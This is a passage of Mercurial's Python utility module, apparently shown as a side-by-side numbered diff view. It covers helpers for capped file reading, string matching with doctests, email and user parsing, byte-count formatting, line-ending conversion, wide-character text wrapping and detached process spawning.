2241 assert limit is None or limit >= 0
2236 while True:
2242 while True:
2237 if limit is None:
2243 if limit is None:
2238 nbytes = size
2244 nbytes = size
2239 else:
2245 else:
2240 nbytes = min(limit, size)
2246 nbytes = min(limit, size)
2241 s = nbytes and f.read(nbytes)
2247 s = nbytes and f.read(nbytes)
2242 if not s:
2248 if not s:
2243 break
2249 break
2244 if limit:
2250 if limit:
2245 limit -= len(s)
2251 limit -= len(s)
2246 yield s
2252 yield s
2247
2253
2248 class cappedreader(object):
2254 class cappedreader(object):
2249 """A file object proxy that allows reading up to N bytes.
2255 """A file object proxy that allows reading up to N bytes.
2250
2256
2251 Given a source file object, instances of this type allow reading up to
2257 Given a source file object, instances of this type allow reading up to
2252 N bytes from that source file object. Attempts to read past the allowed
2258 N bytes from that source file object. Attempts to read past the allowed
2253 limit are treated as EOF.
2259 limit are treated as EOF.
2254
2260
2255 It is assumed that I/O is not performed on the original file object
2261 It is assumed that I/O is not performed on the original file object
2256 in addition to I/O that is performed by this instance. If there is,
2262 in addition to I/O that is performed by this instance. If there is,
2257 state tracking will get out of sync and unexpected results will ensue.
2263 state tracking will get out of sync and unexpected results will ensue.
2258 """
2264 """
2259 def __init__(self, fh, limit):
2265 def __init__(self, fh, limit):
2260 """Allow reading up to <limit> bytes from <fh>."""
2266 """Allow reading up to <limit> bytes from <fh>."""
2261 self._fh = fh
2267 self._fh = fh
2262 self._left = limit
2268 self._left = limit
2263
2269
2264 def read(self, n=-1):
2270 def read(self, n=-1):
2265 if not self._left:
2271 if not self._left:
2266 return b''
2272 return b''
2267
2273
2268 if n < 0:
2274 if n < 0:
2269 n = self._left
2275 n = self._left
2270
2276
2271 data = self._fh.read(min(n, self._left))
2277 data = self._fh.read(min(n, self._left))
2272 self._left -= len(data)
2278 self._left -= len(data)
2273 assert self._left >= 0
2279 assert self._left >= 0
2274
2280
2275 return data
2281 return data
2276
2282
2277 def stringmatcher(pattern, casesensitive=True):
2283 def stringmatcher(pattern, casesensitive=True):
2278 """
2284 """
2279 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2285 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2280 returns the matcher name, pattern, and matcher function.
2286 returns the matcher name, pattern, and matcher function.
2281 missing or unknown prefixes are treated as literal matches.
2287 missing or unknown prefixes are treated as literal matches.
2282
2288
2283 helper for tests:
2289 helper for tests:
2284 >>> def test(pattern, *tests):
2290 >>> def test(pattern, *tests):
2285 ... kind, pattern, matcher = stringmatcher(pattern)
2291 ... kind, pattern, matcher = stringmatcher(pattern)
2286 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2292 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2287 >>> def itest(pattern, *tests):
2293 >>> def itest(pattern, *tests):
2288 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2294 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2289 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2295 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2290
2296
2291 exact matching (no prefix):
2297 exact matching (no prefix):
2292 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2298 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2293 ('literal', 'abcdefg', [False, False, True])
2299 ('literal', 'abcdefg', [False, False, True])
2294
2300
2295 regex matching ('re:' prefix)
2301 regex matching ('re:' prefix)
2296 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2302 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2297 ('re', 'a.+b', [False, False, True])
2303 ('re', 'a.+b', [False, False, True])
2298
2304
2299 force exact matches ('literal:' prefix)
2305 force exact matches ('literal:' prefix)
2300 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2306 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2301 ('literal', 're:foobar', [False, True])
2307 ('literal', 're:foobar', [False, True])
2302
2308
2303 unknown prefixes are ignored and treated as literals
2309 unknown prefixes are ignored and treated as literals
2304 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2310 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2305 ('literal', 'foo:bar', [False, False, True])
2311 ('literal', 'foo:bar', [False, False, True])
2306
2312
2307 case insensitive regex matches
2313 case insensitive regex matches
2308 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2314 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2309 ('re', 'A.+b', [False, False, True])
2315 ('re', 'A.+b', [False, False, True])
2310
2316
2311 case insensitive literal matches
2317 case insensitive literal matches
2312 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2318 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2313 ('literal', 'ABCDEFG', [False, False, True])
2319 ('literal', 'ABCDEFG', [False, False, True])
2314 """
2320 """
2315 if pattern.startswith('re:'):
2321 if pattern.startswith('re:'):
2316 pattern = pattern[3:]
2322 pattern = pattern[3:]
2317 try:
2323 try:
2318 flags = 0
2324 flags = 0
2319 if not casesensitive:
2325 if not casesensitive:
2320 flags = remod.I
2326 flags = remod.I
2321 regex = remod.compile(pattern, flags)
2327 regex = remod.compile(pattern, flags)
2322 except remod.error as e:
2328 except remod.error as e:
2323 raise error.ParseError(_('invalid regular expression: %s')
2329 raise error.ParseError(_('invalid regular expression: %s')
2324 % e)
2330 % e)
2325 return 're', pattern, regex.search
2331 return 're', pattern, regex.search
2326 elif pattern.startswith('literal:'):
2332 elif pattern.startswith('literal:'):
2327 pattern = pattern[8:]
2333 pattern = pattern[8:]
2328
2334
2329 match = pattern.__eq__
2335 match = pattern.__eq__
2330
2336
2331 if not casesensitive:
2337 if not casesensitive:
2332 ipat = encoding.lower(pattern)
2338 ipat = encoding.lower(pattern)
2333 match = lambda s: ipat == encoding.lower(s)
2339 match = lambda s: ipat == encoding.lower(s)
2334 return 'literal', pattern, match
2340 return 'literal', pattern, match
2335
2341
2336 def shortuser(user):
2342 def shortuser(user):
2337 """Return a short representation of a user name or email address."""
2343 """Return a short representation of a user name or email address."""
2338 f = user.find('@')
2344 f = user.find('@')
2339 if f >= 0:
2345 if f >= 0:
2340 user = user[:f]
2346 user = user[:f]
2341 f = user.find('<')
2347 f = user.find('<')
2342 if f >= 0:
2348 if f >= 0:
2343 user = user[f + 1:]
2349 user = user[f + 1:]
2344 f = user.find(' ')
2350 f = user.find(' ')
2345 if f >= 0:
2351 if f >= 0:
2346 user = user[:f]
2352 user = user[:f]
2347 f = user.find('.')
2353 f = user.find('.')
2348 if f >= 0:
2354 if f >= 0:
2349 user = user[:f]
2355 user = user[:f]
2350 return user
2356 return user
2351
2357
2352 def emailuser(user):
2358 def emailuser(user):
2353 """Return the user portion of an email address."""
2359 """Return the user portion of an email address."""
2354 f = user.find('@')
2360 f = user.find('@')
2355 if f >= 0:
2361 if f >= 0:
2356 user = user[:f]
2362 user = user[:f]
2357 f = user.find('<')
2363 f = user.find('<')
2358 if f >= 0:
2364 if f >= 0:
2359 user = user[f + 1:]
2365 user = user[f + 1:]
2360 return user
2366 return user
2361
2367
2362 def email(author):
2368 def email(author):
2363 '''get email of author.'''
2369 '''get email of author.'''
2364 r = author.find('>')
2370 r = author.find('>')
2365 if r == -1:
2371 if r == -1:
2366 r = None
2372 r = None
2367 return author[author.find('<') + 1:r]
2373 return author[author.find('<') + 1:r]
2368
2374
2369 def ellipsis(text, maxlength=400):
2375 def ellipsis(text, maxlength=400):
2370 """Trim string to at most maxlength (default: 400) columns in display."""
2376 """Trim string to at most maxlength (default: 400) columns in display."""
2371 return encoding.trim(text, maxlength, ellipsis='...')
2377 return encoding.trim(text, maxlength, ellipsis='...')
2372
2378
2373 def unitcountfn(*unittable):
2379 def unitcountfn(*unittable):
2374 '''return a function that renders a readable count of some quantity'''
2380 '''return a function that renders a readable count of some quantity'''
2375
2381
2376 def go(count):
2382 def go(count):
2377 for multiplier, divisor, format in unittable:
2383 for multiplier, divisor, format in unittable:
2378 if abs(count) >= divisor * multiplier:
2384 if abs(count) >= divisor * multiplier:
2379 return format % (count / float(divisor))
2385 return format % (count / float(divisor))
2380 return unittable[-1][2] % count
2386 return unittable[-1][2] % count
2381
2387
2382 return go
2388 return go
2383
2389
2384 def processlinerange(fromline, toline):
2390 def processlinerange(fromline, toline):
2385 """Check that linerange <fromline>:<toline> makes sense and return a
2391 """Check that linerange <fromline>:<toline> makes sense and return a
2386 0-based range.
2392 0-based range.
2387
2393
2388 >>> processlinerange(10, 20)
2394 >>> processlinerange(10, 20)
2389 (9, 20)
2395 (9, 20)
2390 >>> processlinerange(2, 1)
2396 >>> processlinerange(2, 1)
2391 Traceback (most recent call last):
2397 Traceback (most recent call last):
2392 ...
2398 ...
2393 ParseError: line range must be positive
2399 ParseError: line range must be positive
2394 >>> processlinerange(0, 5)
2400 >>> processlinerange(0, 5)
2395 Traceback (most recent call last):
2401 Traceback (most recent call last):
2396 ...
2402 ...
2397 ParseError: fromline must be strictly positive
2403 ParseError: fromline must be strictly positive
2398 """
2404 """
2399 if toline - fromline < 0:
2405 if toline - fromline < 0:
2400 raise error.ParseError(_("line range must be positive"))
2406 raise error.ParseError(_("line range must be positive"))
2401 if fromline < 1:
2407 if fromline < 1:
2402 raise error.ParseError(_("fromline must be strictly positive"))
2408 raise error.ParseError(_("fromline must be strictly positive"))
2403 return fromline - 1, toline
2409 return fromline - 1, toline
2404
2410
2405 bytecount = unitcountfn(
2411 bytecount = unitcountfn(
2406 (100, 1 << 30, _('%.0f GB')),
2412 (100, 1 << 30, _('%.0f GB')),
2407 (10, 1 << 30, _('%.1f GB')),
2413 (10, 1 << 30, _('%.1f GB')),
2408 (1, 1 << 30, _('%.2f GB')),
2414 (1, 1 << 30, _('%.2f GB')),
2409 (100, 1 << 20, _('%.0f MB')),
2415 (100, 1 << 20, _('%.0f MB')),
2410 (10, 1 << 20, _('%.1f MB')),
2416 (10, 1 << 20, _('%.1f MB')),
2411 (1, 1 << 20, _('%.2f MB')),
2417 (1, 1 << 20, _('%.2f MB')),
2412 (100, 1 << 10, _('%.0f KB')),
2418 (100, 1 << 10, _('%.0f KB')),
2413 (10, 1 << 10, _('%.1f KB')),
2419 (10, 1 << 10, _('%.1f KB')),
2414 (1, 1 << 10, _('%.2f KB')),
2420 (1, 1 << 10, _('%.2f KB')),
2415 (1, 1, _('%.0f bytes')),
2421 (1, 1, _('%.0f bytes')),
2416 )
2422 )
2417
2423
2418 # Matches a single EOL which can either be a CRLF where repeated CR
2424 # Matches a single EOL which can either be a CRLF where repeated CR
2419 # are removed or a LF. We do not care about old Macintosh files, so a
2425 # are removed or a LF. We do not care about old Macintosh files, so a
2420 # stray CR is an error.
2426 # stray CR is an error.
2421 _eolre = remod.compile(br'\r*\n')
2427 _eolre = remod.compile(br'\r*\n')
2422
2428
2423 def tolf(s):
2429 def tolf(s):
2424 return _eolre.sub('\n', s)
2430 return _eolre.sub('\n', s)
2425
2431
2426 def tocrlf(s):
2432 def tocrlf(s):
2427 return _eolre.sub('\r\n', s)
2433 return _eolre.sub('\r\n', s)
2428
2434
2429 if pycompat.oslinesep == '\r\n':
2435 if pycompat.oslinesep == '\r\n':
2430 tonativeeol = tocrlf
2436 tonativeeol = tocrlf
2431 fromnativeeol = tolf
2437 fromnativeeol = tolf
2432 else:
2438 else:
2433 tonativeeol = pycompat.identity
2439 tonativeeol = pycompat.identity
2434 fromnativeeol = pycompat.identity
2440 fromnativeeol = pycompat.identity
2435
2441
2436 def escapestr(s):
2442 def escapestr(s):
2437 # call underlying function of s.encode('string_escape') directly for
2443 # call underlying function of s.encode('string_escape') directly for
2438 # Python 3 compatibility
2444 # Python 3 compatibility
2439 return codecs.escape_encode(s)[0]
2445 return codecs.escape_encode(s)[0]
2440
2446
2441 def unescapestr(s):
2447 def unescapestr(s):
2442 return codecs.escape_decode(s)[0]
2448 return codecs.escape_decode(s)[0]
2443
2449
2444 def forcebytestr(obj):
2450 def forcebytestr(obj):
2445 """Portably format an arbitrary object (e.g. exception) into a byte
2451 """Portably format an arbitrary object (e.g. exception) into a byte
2446 string."""
2452 string."""
2447 try:
2453 try:
2448 return pycompat.bytestr(obj)
2454 return pycompat.bytestr(obj)
2449 except UnicodeEncodeError:
2455 except UnicodeEncodeError:
2450 # non-ascii string, may be lossy
2456 # non-ascii string, may be lossy
2451 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2457 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2452
2458
2453 def uirepr(s):
2459 def uirepr(s):
2454 # Avoid double backslash in Windows path repr()
2460 # Avoid double backslash in Windows path repr()
2455 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2461 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2456
2462
2457 # delay import of textwrap
2463 # delay import of textwrap
2458 def MBTextWrapper(**kwargs):
2464 def MBTextWrapper(**kwargs):
2459 class tw(textwrap.TextWrapper):
2465 class tw(textwrap.TextWrapper):
2460 """
2466 """
2461 Extend TextWrapper for width-awareness.
2467 Extend TextWrapper for width-awareness.
2462
2468
2463 Neither number of 'bytes' in any encoding nor 'characters' is
2469 Neither number of 'bytes' in any encoding nor 'characters' is
2464 appropriate to calculate terminal columns for specified string.
2470 appropriate to calculate terminal columns for specified string.
2465
2471
2466 Original TextWrapper implementation uses built-in 'len()' directly,
2472 Original TextWrapper implementation uses built-in 'len()' directly,
2467 so overriding is needed to use width information of each characters.
2473 so overriding is needed to use width information of each characters.
2468
2474
2469 In addition, characters classified into 'ambiguous' width are
2475 In addition, characters classified into 'ambiguous' width are
2470 treated as wide in East Asian area, but as narrow in other.
2476 treated as wide in East Asian area, but as narrow in other.
2471
2477
2472 This requires use decision to determine width of such characters.
2478 This requires use decision to determine width of such characters.
2473 """
2479 """
2474 def _cutdown(self, ucstr, space_left):
2480 def _cutdown(self, ucstr, space_left):
2475 l = 0
2481 l = 0
2476 colwidth = encoding.ucolwidth
2482 colwidth = encoding.ucolwidth
2477 for i in xrange(len(ucstr)):
2483 for i in xrange(len(ucstr)):
2478 l += colwidth(ucstr[i])
2484 l += colwidth(ucstr[i])
2479 if space_left < l:
2485 if space_left < l:
2480 return (ucstr[:i], ucstr[i:])
2486 return (ucstr[:i], ucstr[i:])
2481 return ucstr, ''
2487 return ucstr, ''
2482
2488
2483 # overriding of base class
2489 # overriding of base class
2484 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2490 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2485 space_left = max(width - cur_len, 1)
2491 space_left = max(width - cur_len, 1)
2486
2492
2487 if self.break_long_words:
2493 if self.break_long_words:
2488 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2494 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2489 cur_line.append(cut)
2495 cur_line.append(cut)
2490 reversed_chunks[-1] = res
2496 reversed_chunks[-1] = res
2491 elif not cur_line:
2497 elif not cur_line:
2492 cur_line.append(reversed_chunks.pop())
2498 cur_line.append(reversed_chunks.pop())
2493
2499
2494 # this overriding code is imported from TextWrapper of Python 2.6
2500 # this overriding code is imported from TextWrapper of Python 2.6
2495 # to calculate columns of string by 'encoding.ucolwidth()'
2501 # to calculate columns of string by 'encoding.ucolwidth()'
2496 def _wrap_chunks(self, chunks):
2502 def _wrap_chunks(self, chunks):
2497 colwidth = encoding.ucolwidth
2503 colwidth = encoding.ucolwidth
2498
2504
2499 lines = []
2505 lines = []
2500 if self.width <= 0:
2506 if self.width <= 0:
2501 raise ValueError("invalid width %r (must be > 0)" % self.width)
2507 raise ValueError("invalid width %r (must be > 0)" % self.width)
2502
2508
2503 # Arrange in reverse order so items can be efficiently popped
2509 # Arrange in reverse order so items can be efficiently popped
2504 # from a stack of chucks.
2510 # from a stack of chucks.
2505 chunks.reverse()
2511 chunks.reverse()
2506
2512
2507 while chunks:
2513 while chunks:
2508
2514
2509 # Start the list of chunks that will make up the current line.
2515 # Start the list of chunks that will make up the current line.
2510 # cur_len is just the length of all the chunks in cur_line.
2516 # cur_len is just the length of all the chunks in cur_line.
2511 cur_line = []
2517 cur_line = []
2512 cur_len = 0
2518 cur_len = 0
2513
2519
2514 # Figure out which static string will prefix this line.
2520 # Figure out which static string will prefix this line.
2515 if lines:
2521 if lines:
2516 indent = self.subsequent_indent
2522 indent = self.subsequent_indent
2517 else:
2523 else:
2518 indent = self.initial_indent
2524 indent = self.initial_indent
2519
2525
2520 # Maximum width for this line.
2526 # Maximum width for this line.
2521 width = self.width - len(indent)
2527 width = self.width - len(indent)
2522
2528
2523 # First chunk on line is whitespace -- drop it, unless this
2529 # First chunk on line is whitespace -- drop it, unless this
2524 # is the very beginning of the text (i.e. no lines started yet).
2530 # is the very beginning of the text (i.e. no lines started yet).
2525 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2531 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2526 del chunks[-1]
2532 del chunks[-1]
2527
2533
2528 while chunks:
2534 while chunks:
2529 l = colwidth(chunks[-1])
2535 l = colwidth(chunks[-1])
2530
2536
2531 # Can at least squeeze this chunk onto the current line.
2537 # Can at least squeeze this chunk onto the current line.
2532 if cur_len + l <= width:
2538 if cur_len + l <= width:
2533 cur_line.append(chunks.pop())
2539 cur_line.append(chunks.pop())
2534 cur_len += l
2540 cur_len += l
2535
2541
2536 # Nope, this line is full.
2542 # Nope, this line is full.
2537 else:
2543 else:
2538 break
2544 break
2539
2545
2540 # The current line is full, and the next chunk is too big to
2546 # The current line is full, and the next chunk is too big to
2541 # fit on *any* line (not just this one).
2547 # fit on *any* line (not just this one).
2542 if chunks and colwidth(chunks[-1]) > width:
2548 if chunks and colwidth(chunks[-1]) > width:
2543 self._handle_long_word(chunks, cur_line, cur_len, width)
2549 self._handle_long_word(chunks, cur_line, cur_len, width)
2544
2550
2545 # If the last chunk on this line is all whitespace, drop it.
2551 # If the last chunk on this line is all whitespace, drop it.
2546 if (self.drop_whitespace and
2552 if (self.drop_whitespace and
2547 cur_line and cur_line[-1].strip() == r''):
2553 cur_line and cur_line[-1].strip() == r''):
2548 del cur_line[-1]
2554 del cur_line[-1]
2549
2555
2550 # Convert current line back to a string and store it in list
2556 # Convert current line back to a string and store it in list
2551 # of all lines (return value).
2557 # of all lines (return value).
2552 if cur_line:
2558 if cur_line:
2553 lines.append(indent + r''.join(cur_line))
2559 lines.append(indent + r''.join(cur_line))
2554
2560
2555 return lines
2561 return lines
2556
2562
2557 global MBTextWrapper
2563 global MBTextWrapper
2558 MBTextWrapper = tw
2564 MBTextWrapper = tw
2559 return tw(**kwargs)
2565 return tw(**kwargs)
2560
2566
2561 def wrap(line, width, initindent='', hangindent=''):
2567 def wrap(line, width, initindent='', hangindent=''):
2562 maxindent = max(len(hangindent), len(initindent))
2568 maxindent = max(len(hangindent), len(initindent))
2563 if width <= maxindent:
2569 if width <= maxindent:
2564 # adjust for weird terminal size
2570 # adjust for weird terminal size
2565 width = max(78, maxindent + 1)
2571 width = max(78, maxindent + 1)
2566 line = line.decode(pycompat.sysstr(encoding.encoding),
2572 line = line.decode(pycompat.sysstr(encoding.encoding),
2567 pycompat.sysstr(encoding.encodingmode))
2573 pycompat.sysstr(encoding.encodingmode))
2568 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2574 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2569 pycompat.sysstr(encoding.encodingmode))
2575 pycompat.sysstr(encoding.encodingmode))
2570 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2576 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2571 pycompat.sysstr(encoding.encodingmode))
2577 pycompat.sysstr(encoding.encodingmode))
2572 wrapper = MBTextWrapper(width=width,
2578 wrapper = MBTextWrapper(width=width,
2573 initial_indent=initindent,
2579 initial_indent=initindent,
2574 subsequent_indent=hangindent)
2580 subsequent_indent=hangindent)
2575 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2581 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2576
2582
2577 if (pyplatform.python_implementation() == 'CPython' and
2583 if (pyplatform.python_implementation() == 'CPython' and
2578 sys.version_info < (3, 0)):
2584 sys.version_info < (3, 0)):
2579 # There is an issue in CPython that some IO methods do not handle EINTR
2585 # There is an issue in CPython that some IO methods do not handle EINTR
2580 # correctly. The following table shows what CPython version (and functions)
2586 # correctly. The following table shows what CPython version (and functions)
2581 # are affected (buggy: has the EINTR bug, okay: otherwise):
2587 # are affected (buggy: has the EINTR bug, okay: otherwise):
2582 #
2588 #
2583 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2589 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2584 # --------------------------------------------------
2590 # --------------------------------------------------
2585 # fp.__iter__ | buggy | buggy | okay
2591 # fp.__iter__ | buggy | buggy | okay
2586 # fp.read* | buggy | okay [1] | okay
2592 # fp.read* | buggy | okay [1] | okay
2587 #
2593 #
2588 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2594 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2589 #
2595 #
2590 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2596 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2591 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2597 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2592 #
2598 #
2593 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2599 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2594 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2600 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2595 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2601 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2596 # fp.__iter__ but not other fp.read* methods.
2602 # fp.__iter__ but not other fp.read* methods.
2597 #
2603 #
2598 # On modern systems like Linux, the "read" syscall cannot be interrupted
2604 # On modern systems like Linux, the "read" syscall cannot be interrupted
2599 # when reading "fast" files like on-disk files. So the EINTR issue only
2605 # when reading "fast" files like on-disk files. So the EINTR issue only
2600 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2606 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2601 # files approximately as "fast" files and use the fast (unsafe) code path,
2607 # files approximately as "fast" files and use the fast (unsafe) code path,
2602 # to minimize the performance impact.
2608 # to minimize the performance impact.
2603 if sys.version_info >= (2, 7, 4):
2609 if sys.version_info >= (2, 7, 4):
2604 # fp.readline deals with EINTR correctly, use it as a workaround.
2610 # fp.readline deals with EINTR correctly, use it as a workaround.
2605 def _safeiterfile(fp):
2611 def _safeiterfile(fp):
2606 return iter(fp.readline, '')
2612 return iter(fp.readline, '')
2607 else:
2613 else:
2608 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2614 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2609 # note: this may block longer than necessary because of bufsize.
2615 # note: this may block longer than necessary because of bufsize.
2610 def _safeiterfile(fp, bufsize=4096):
2616 def _safeiterfile(fp, bufsize=4096):
2611 fd = fp.fileno()
2617 fd = fp.fileno()
2612 line = ''
2618 line = ''
2613 while True:
2619 while True:
2614 try:
2620 try:
2615 buf = os.read(fd, bufsize)
2621 buf = os.read(fd, bufsize)
2616 except OSError as ex:
2622 except OSError as ex:
2617 # os.read only raises EINTR before any data is read
2623 # os.read only raises EINTR before any data is read
2618 if ex.errno == errno.EINTR:
2624 if ex.errno == errno.EINTR:
2619 continue
2625 continue
2620 else:
2626 else:
2621 raise
2627 raise
2622 line += buf
2628 line += buf
2623 if '\n' in buf:
2629 if '\n' in buf:
2624 splitted = line.splitlines(True)
2630 splitted = line.splitlines(True)
2625 line = ''
2631 line = ''
2626 for l in splitted:
2632 for l in splitted:
2627 if l[-1] == '\n':
2633 if l[-1] == '\n':
2628 yield l
2634 yield l
2629 else:
2635 else:
2630 line = l
2636 line = l
2631 if not buf:
2637 if not buf:
2632 break
2638 break
2633 if line:
2639 if line:
2634 yield line
2640 yield line
2635
2641
2636 def iterfile(fp):
2642 def iterfile(fp):
2637 fastpath = True
2643 fastpath = True
2638 if type(fp) is file:
2644 if type(fp) is file:
2639 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2645 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2640 if fastpath:
2646 if fastpath:
2641 return fp
2647 return fp
2642 else:
2648 else:
2643 return _safeiterfile(fp)
2649 return _safeiterfile(fp)
2644 else:
2650 else:
2645 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2651 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2646 def iterfile(fp):
2652 def iterfile(fp):
2647 return fp
2653 return fp
2648
2654
2649 def iterlines(iterator):
2655 def iterlines(iterator):
2650 for chunk in iterator:
2656 for chunk in iterator:
2651 for line in chunk.splitlines():
2657 for line in chunk.splitlines():
2652 yield line
2658 yield line
2653
2659
2654 def expandpath(path):
2660 def expandpath(path):
2655 return os.path.expanduser(os.path.expandvars(path))
2661 return os.path.expanduser(os.path.expandvars(path))
2656
2662
2657 def hgcmd():
2663 def hgcmd():
2658 """Return the command used to execute current hg
2664 """Return the command used to execute current hg
2659
2665
2660 This is different from hgexecutable() because on Windows we want
2666 This is different from hgexecutable() because on Windows we want
2661 to avoid things opening new shell windows like batch files, so we
2667 to avoid things opening new shell windows like batch files, so we
2662 get either the python call or current executable.
2668 get either the python call or current executable.
2663 """
2669 """
2664 if mainfrozen():
2670 if mainfrozen():
2665 if getattr(sys, 'frozen', None) == 'macosx_app':
2671 if getattr(sys, 'frozen', None) == 'macosx_app':
2666 # Env variable set by py2app
2672 # Env variable set by py2app
2667 return [encoding.environ['EXECUTABLEPATH']]
2673 return [encoding.environ['EXECUTABLEPATH']]
2668 else:
2674 else:
2669 return [pycompat.sysexecutable]
2675 return [pycompat.sysexecutable]
2670 return gethgcmd()
2676 return gethgcmd()
2671
2677
2672 def rundetached(args, condfn):
2678 def rundetached(args, condfn):
2673 """Execute the argument list in a detached process.
2679 """Execute the argument list in a detached process.
2674
2680
2675 condfn is a callable which is called repeatedly and should return
2681 condfn is a callable which is called repeatedly and should return
2676 True once the child process is known to have started successfully.
2682 True once the child process is known to have started successfully.
2677 At this point, the child process PID is returned. If the child
2683 At this point, the child process PID is returned. If the child
2678 process fails to start or finishes before condfn() evaluates to
2684 process fails to start or finishes before condfn() evaluates to
2679 True, return -1.
2685 True, return -1.
2680 """
2686 """
2681 # Windows case is easier because the child process is either
2687 # Windows case is easier because the child process is either
2682 # successfully starting and validating the condition or exiting
2688 # successfully starting and validating the condition or exiting
2683 # on failure. We just poll on its PID. On Unix, if the child
2689 # on failure. We just poll on its PID. On Unix, if the child
2684 # process fails to start, it will be left in a zombie state until
2690 # process fails to start, it will be left in a zombie state until
2685 # the parent wait on it, which we cannot do since we expect a long
2691 # the parent wait on it, which we cannot do since we expect a long
2686 # running process on success. Instead we listen for SIGCHLD telling
2692 # running process on success. Instead we listen for SIGCHLD telling
2687 # us our child process terminated.
2693 # us our child process terminated.
2688 terminated = set()
2694 terminated = set()
2689 def handler(signum, frame):
2695 def handler(signum, frame):
2690 terminated.add(os.wait())
2696 terminated.add(os.wait())
2691 prevhandler = None
2697 prevhandler = None
2692 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2698 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2693 if SIGCHLD is not None:
2699 if SIGCHLD is not None:
2694 prevhandler = signal.signal(SIGCHLD, handler)
2700 prevhandler = signal.signal(SIGCHLD, handler)
2695 try:
2701 try:
2696 pid = spawndetached(args)
2702 pid = spawndetached(args)
2697 while not condfn():
2703 while not condfn():
2698 if ((pid in terminated or not testpid(pid))
2704 if ((pid in terminated or not testpid(pid))
2699 and not condfn()):
2705 and not condfn()):
2700 return -1
2706 return -1
2701 time.sleep(0.1)
2707 time.sleep(0.1)
2702 return pid
2708 return pid
2703 finally:
2709 finally:
2704 if prevhandler is not None:
2710 if prevhandler is not None:
2705 signal.signal(signal.SIGCHLD, prevhandler)
2711 signal.signal(signal.SIGCHLD, prevhandler)
2706
2712
2707 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2713 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2708 """Return the result of interpolating items in the mapping into string s.
2714 """Return the result of interpolating items in the mapping into string s.
2709
2715
2710 prefix is a single character string, or a two character string with
2716 prefix is a single character string, or a two character string with
2711 a backslash as the first character if the prefix needs to be escaped in
2717 a backslash as the first character if the prefix needs to be escaped in
2712 a regular expression.
2718 a regular expression.
2713
2719
2714 fn is an optional function that will be applied to the replacement text
2720 fn is an optional function that will be applied to the replacement text
2715 just before replacement.
2721 just before replacement.
2716
2722
2717 escape_prefix is an optional flag that allows using doubled prefix for
2723 escape_prefix is an optional flag that allows using doubled prefix for
2718 its escaping.
2724 its escaping.
2719 """
2725 """
2720 fn = fn or (lambda s: s)
2726 fn = fn or (lambda s: s)
2721 patterns = '|'.join(mapping.keys())
2727 patterns = '|'.join(mapping.keys())
2722 if escape_prefix:
2728 if escape_prefix:
2723 patterns += '|' + prefix
2729 patterns += '|' + prefix
2724 if len(prefix) > 1:
2730 if len(prefix) > 1:
2725 prefix_char = prefix[1:]
2731 prefix_char = prefix[1:]
2726 else:
2732 else:
2727 prefix_char = prefix
2733 prefix_char = prefix
2728 mapping[prefix_char] = prefix_char
2734 mapping[prefix_char] = prefix_char
2729 r = remod.compile(br'%s(%s)' % (prefix, patterns))
